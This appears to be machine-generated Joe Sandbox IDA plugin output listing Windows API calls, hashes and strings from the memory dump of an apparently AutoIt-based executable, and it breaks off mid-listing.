                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: mouse_event
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 2434400541-0
                                                                                                                                                                                                                                                                                                                            • Opcode ID: eecc504360454be2e9ae466588590aa5cb36429002dcb66ff3f0773a84eddf23
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 4902c453e73fe648f5e66353dcde2000c76190e371c6772d991c707b641d20a5
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: eecc504360454be2e9ae466588590aa5cb36429002dcb66ff3f0773a84eddf23
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B9D017F61B0202A9EC190E3C9B2FE3A090AA302741F866B4BF122D55D5E4C1A92C9121
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • SetUnhandledExceptionFilter.KERNEL32(Function_00020D51,001F075E), ref: 001F0D4A
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
• Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: ExceptionFilterUnhandled
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 3192549508-0
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 4067232ea58fa91b1eff686c1a20048d958cc7280d5b37ae1b4c1af10f6454bc
                                                                                                                                                                                                                                                                                                                            • Instruction ID: c99bbad6ec1cba711622fa8235458088eb9c8d74dea16346a57ac620ec084d9d
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4067232ea58fa91b1eff686c1a20048d958cc7280d5b37ae1b4c1af10f6454bc
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • DeleteObject.GDI32(00000000), ref: 0025358D
                                                                                                                                                                                                                                                                                                                            • DeleteObject.GDI32(00000000), ref: 002535A0
                                                                                                                                                                                                                                                                                                                            • DestroyWindow.USER32 ref: 002535AF
                                                                                                                                                                                                                                                                                                                            • GetDesktopWindow.USER32 ref: 002535CA
                                                                                                                                                                                                                                                                                                                            • GetWindowRect.USER32(00000000), ref: 002535D1
                                                                                                                                                                                                                                                                                                                            • SetRect.USER32(?,00000000,00000000,00000007,00000002), ref: 00253700
                                                                                                                                                                                                                                                                                                                            • AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 0025370E
                                                                                                                                                                                                                                                                                                                            • CreateWindowExW.USER32(?,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00253755
                                                                                                                                                                                                                                                                                                                            • GetClientRect.USER32(00000000,?), ref: 00253761
                                                                                                                                                                                                                                                                                                                            • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 0025379D
                                                                                                                                                                                                                                                                                                                            • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 002537BF
                                                                                                                                                                                                                                                                                                                            • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 002537D2
                                                                                                                                                                                                                                                                                                                            • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 002537DD
                                                                                                                                                                                                                                                                                                                            • GlobalLock.KERNEL32(00000000), ref: 002537E6
                                                                                                                                                                                                                                                                                                                            • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 002537F5
                                                                                                                                                                                                                                                                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 002537FE
                                                                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00253805
                                                                                                                                                                                                                                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 00253810
                                                                                                                                                                                                                                                                                                                            • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00253822
                                                                                                                                                                                                                                                                                                                            • OleLoadPicture.OLEAUT32(?,00000000,00000000,00270C04,00000000), ref: 00253838
                                                                                                                                                                                                                                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 00253848
                                                                                                                                                                                                                                                                                                                            • CopyImage.USER32(00000007,00000000,00000000,00000000,00002000), ref: 0025386E
                                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,00000172,00000000,00000007), ref: 0025388D
                                                                                                                                                                                                                                                                                                                            • SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 002538AF
                                                                                                                                                                                                                                                                                                                            • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00253A9C
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
• Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                                                                                                                                                                                                                                                                                            • String ID: $AutoIt v3$DISPLAY$static
                                                                                                                                                                                                                                                                                                                            • API String ID: 2211948467-2373415609
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 919610e54a185192dec5d545f45eaa4af3f8b245328a796bb25d6bcf299018a4
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 2f4d75ebfac7fde691f4d87ac1cfd8e0e34c1ea6f5164ba275a4f28997db096d
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 919610e54a185192dec5d545f45eaa4af3f8b245328a796bb25d6bcf299018a4
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7F027971A10209EFDB14DF64DC8DEAE7BB9EF49311F008558F915AB2A0CBB4AD05CB64
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • DestroyWindow.USER32(?,?), ref: 001D16B4
                                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001308,?,00000000), ref: 00212B07
                                                                                                                                                                                                                                                                                                                            • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 00212B40
                                                                                                                                                                                                                                                                                                                            • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00212F85
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 001D1802: InvalidateRect.USER32(?,00000000,00000001,?,?,?,001D1488,?,00000000,?,?,?,?,001D145A,00000000,?), ref: 001D1865
                                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001053), ref: 00212FC1
                                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00212FD8
                                                                                                                                                                                                                                                                                                                            • ImageList_Destroy.COMCTL32(00000000,?), ref: 00212FEE
                                                                                                                                                                                                                                                                                                                            • ImageList_Destroy.COMCTL32(00000000,?), ref: 00212FF9
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
• Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: DestroyImageList_MessageSend$Window$InvalidateMoveRectRemove
                                                                                                                                                                                                                                                                                                                            • String ID: 0$(*$(*$(*
                                                                                                                                                                                                                                                                                                                            • API String ID: 2760611726-2353856374
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 69ab286c0fbdb69c93495ba0b525380235c353f26459ad25b15c819ff4970b26
                                                                                                                                                                                                                                                                                                                            • Instruction ID: b05a5375ddcef630b4950c464c68880665e734583be8b4caecd8ab85d2efda9a
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 69ab286c0fbdb69c93495ba0b525380235c353f26459ad25b15c819ff4970b26
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F112E230610212EFC725CF14D848BAAB7F5FB65300F18852AF5559B661CB71ECAACF91
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • SetTextColor.GDI32(?,00000000), ref: 00267B67
                                                                                                                                                                                                                                                                                                                            • GetSysColorBrush.USER32(0000000F), ref: 00267B98
                                                                                                                                                                                                                                                                                                                            • GetSysColor.USER32(0000000F), ref: 00267BA4
                                                                                                                                                                                                                                                                                                                            • SetBkColor.GDI32(?,000000FF), ref: 00267BBE
                                                                                                                                                                                                                                                                                                                            • SelectObject.GDI32(?,?), ref: 00267BCD
                                                                                                                                                                                                                                                                                                                            • InflateRect.USER32(?,000000FF,000000FF), ref: 00267BF8
                                                                                                                                                                                                                                                                                                                            • GetSysColor.USER32(00000010), ref: 00267C00
                                                                                                                                                                                                                                                                                                                            • CreateSolidBrush.GDI32(00000000), ref: 00267C07
                                                                                                                                                                                                                                                                                                                            • FrameRect.USER32(?,?,00000000), ref: 00267C16
                                                                                                                                                                                                                                                                                                                            • DeleteObject.GDI32(00000000), ref: 00267C1D
                                                                                                                                                                                                                                                                                                                            • InflateRect.USER32(?,000000FE,000000FE), ref: 00267C68
                                                                                                                                                                                                                                                                                                                            • FillRect.USER32(?,?,?), ref: 00267C9A
                                                                                                                                                                                                                                                                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00267CBC
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 00267E22: GetSysColor.USER32(00000012), ref: 00267E5B
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 00267E22: SetTextColor.GDI32(?,00267B2D), ref: 00267E5F
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 00267E22: GetSysColorBrush.USER32(0000000F), ref: 00267E75
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 00267E22: GetSysColor.USER32(0000000F), ref: 00267E80
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 00267E22: GetSysColor.USER32(00000011), ref: 00267E9D
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 00267E22: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00267EAB
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 00267E22: SelectObject.GDI32(?,00000000), ref: 00267EBC
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 00267E22: SetBkColor.GDI32(?,?), ref: 00267EC5
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 00267E22: SelectObject.GDI32(?,?), ref: 00267ED2
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 00267E22: InflateRect.USER32(?,000000FF,000000FF), ref: 00267EF1
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 00267E22: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00267F08
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 00267E22: GetWindowLongW.USER32(?,000000F0), ref: 00267F15
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
• Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 4124339563-0
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 41dd9f686acc0ac70d5aac58e5151f92863df9d1bd352a2c6afb0d9a94e52a3e
                                                                                                                                                                                                                                                                                                                            • Instruction ID: d5623f3e4462944090c7172381e62ae0c3d5108a8b96bd66e247f9a1973a793c
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 41dd9f686acc0ac70d5aac58e5151f92863df9d1bd352a2c6afb0d9a94e52a3e
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9AA1CF71518306AFCB009F64EC4CE6BBBA9FF49324F104A19F962961E0D7B1D884CF51
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • DestroyWindow.USER32(00000000), ref: 0025319B
                                                                                                                                                                                                                                                                                                                            • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 002532C7
                                                                                                                                                                                                                                                                                                                            • SetRect.USER32(?,00000000,00000000,0000012C,?), ref: 00253306
                                                                                                                                                                                                                                                                                                                            • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 00253316
                                                                                                                                                                                                                                                                                                                            • CreateWindowExW.USER32(00000008,AutoIt v3,?,88C00000,000000FF,?,?,?,00000000,00000000,00000000), ref: 0025335D
                                                                                                                                                                                                                                                                                                                            • GetClientRect.USER32(00000000,?), ref: 00253369
                                                                                                                                                                                                                                                                                                                            • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000), ref: 002533B2
                                                                                                                                                                                                                                                                                                                            • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 002533C1
                                                                                                                                                                                                                                                                                                                            • GetStockObject.GDI32(00000011), ref: 002533D1
                                                                                                                                                                                                                                                                                                                            • SelectObject.GDI32(00000000,00000000), ref: 002533D5
                                                                                                                                                                                                                                                                                                                            • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?), ref: 002533E5
                                                                                                                                                                                                                                                                                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 002533EE
                                                                                                                                                                                                                                                                                                                            • DeleteDC.GDI32(00000000), ref: 002533F7
                                                                                                                                                                                                                                                                                                                            • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00253423
                                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000030,00000000,00000001), ref: 0025343A
                                                                                                                                                                                                                                                                                                                            • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,-0000001D,00000104,00000014,00000000,00000000,00000000), ref: 0025347A
                                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 0025348E
                                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000404,00000001,00000000), ref: 0025349F
                                                                                                                                                                                                                                                                                                                            • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000041,00000500,-00000027,00000000,00000000,00000000), ref: 002534D4
                                                                                                                                                                                                                                                                                                                            • GetStockObject.GDI32(00000011), ref: 002534DF
                                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 002534EA
                                                                                                                                                                                                                                                                                                                            • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?,?,?), ref: 002534F4
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
• Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                                                                                                                                                                                                                                                                                            • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • SetErrorMode.KERNEL32(00000001), ref: 00245532
                                                                                                                                                                                                                                                                                                                            • GetDriveTypeW.KERNEL32(?,0026DC30,?,\\.\,0026DCD0), ref: 0024560F
                                                                                                                                                                                                                                                                                                                            • SetErrorMode.KERNEL32(00000000,0026DC30,?,\\.\,0026DCD0), ref: 0024577B
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: ErrorMode$DriveType
                                                                                                                                                                                                                                                                                                                            • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 001D25F8
                                                                                                                                                                                                                                                                                                                            • GetSystemMetrics.USER32(00000007), ref: 001D2600
                                                                                                                                                                                                                                                                                                                            • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 001D262B
                                                                                                                                                                                                                                                                                                                            • GetSystemMetrics.USER32(00000008), ref: 001D2633
                                                                                                                                                                                                                                                                                                                            • GetSystemMetrics.USER32(00000004), ref: 001D2658
                                                                                                                                                                                                                                                                                                                            • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 001D2675
                                                                                                                                                                                                                                                                                                                            • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 001D2685
                                                                                                                                                                                                                                                                                                                            • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 001D26B8
                                                                                                                                                                                                                                                                                                                            • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 001D26CC
                                                                                                                                                                                                                                                                                                                            • GetClientRect.USER32(00000000,000000FF), ref: 001D26EA
                                                                                                                                                                                                                                                                                                                            • GetStockObject.GDI32(00000011), ref: 001D2706
                                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,00000030,00000000), ref: 001D2711
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 001D19CD: GetCursorPos.USER32(?), ref: 001D19E1
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 001D19CD: ScreenToClient.USER32(00000000,?), ref: 001D19FE
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 001D19CD: GetAsyncKeyState.USER32(00000001), ref: 001D1A23
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 001D19CD: GetAsyncKeyState.USER32(00000002), ref: 001D1A3D
                                                                                                                                                                                                                                                                                                                            • SetTimer.USER32(00000000,00000000,00000028,001D199C), ref: 001D2738
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                                                                                                                                                                                                                                                                                            • String ID: <)*$<)*$AutoIt v3 GUI$(*$(*$(*
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • GetCursorPos.USER32(?), ref: 00261BC4
                                                                                                                                                                                                                                                                                                                            • GetDesktopWindow.USER32 ref: 00261BD9
                                                                                                                                                                                                                                                                                                                            • GetWindowRect.USER32(00000000), ref: 00261BE0
                                                                                                                                                                                                                                                                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00261C35
                                                                                                                                                                                                                                                                                                                            • DestroyWindow.USER32(?), ref: 00261C55
                                                                                                                                                                                                                                                                                                                            • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,7FFFFFFD,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00261C89
                                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00261CA7
                                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00261CB9
                                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,00000421,?,?), ref: 00261CCE
                                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,0000041D,00000000,00000000), ref: 00261CE1
                                                                                                                                                                                                                                                                                                                            • IsWindowVisible.USER32(00000000), ref: 00261D3D
                                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,00000412,00000000,D8F0D8F0), ref: 00261D58
                                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,00000411,00000001,00000030), ref: 00261D6C
                                                                                                                                                                                                                                                                                                                            • GetWindowRect.USER32(00000000,?), ref: 00261D84
                                                                                                                                                                                                                                                                                                                            • MonitorFromPoint.USER32(?,?,00000002), ref: 00261DAA
                                                                                                                                                                                                                                                                                                                            • GetMonitorInfoW.USER32(00000000,?), ref: 00261DC4
                                                                                                                                                                                                                                                                                                                            • CopyRect.USER32(?,?), ref: 00261DDB
                                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,00000412,00000000), ref: 00261E46
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
• Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                                                                                                                                                                                                                                                                                            • String ID: ($0$tooltips_class32
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • CharUpperBuffW.USER32(?,?), ref: 00260D81
                                                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00260DBB
                                                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00260E25
                                                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00260E8D
                                                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00260F11
                                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00260F61
                                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00260FA0
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 001EFD52: _wcslen.LIBCMT ref: 001EFD5D
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 00232B8C: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00232BA5
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 00232B8C: SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00232BD7
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
• Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: _wcslen$MessageSend$BuffCharUpper
                                                                                                                                                                                                                                                                                                                            • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 00231A45: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00231A60
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 00231A45: GetLastError.KERNEL32(?,00000000,00000000,?,?,002314E7,?,?,?), ref: 00231A6C
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 00231A45: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,002314E7,?,?,?), ref: 00231A7B
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 00231A45: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,002314E7,?,?,?), ref: 00231A82
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 00231A45: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00231A99
                                                                                                                                                                                                                                                                                                                            • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00231741
                                                                                                                                                                                                                                                                                                                            • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00231775
                                                                                                                                                                                                                                                                                                                            • GetLengthSid.ADVAPI32(?), ref: 0023178C
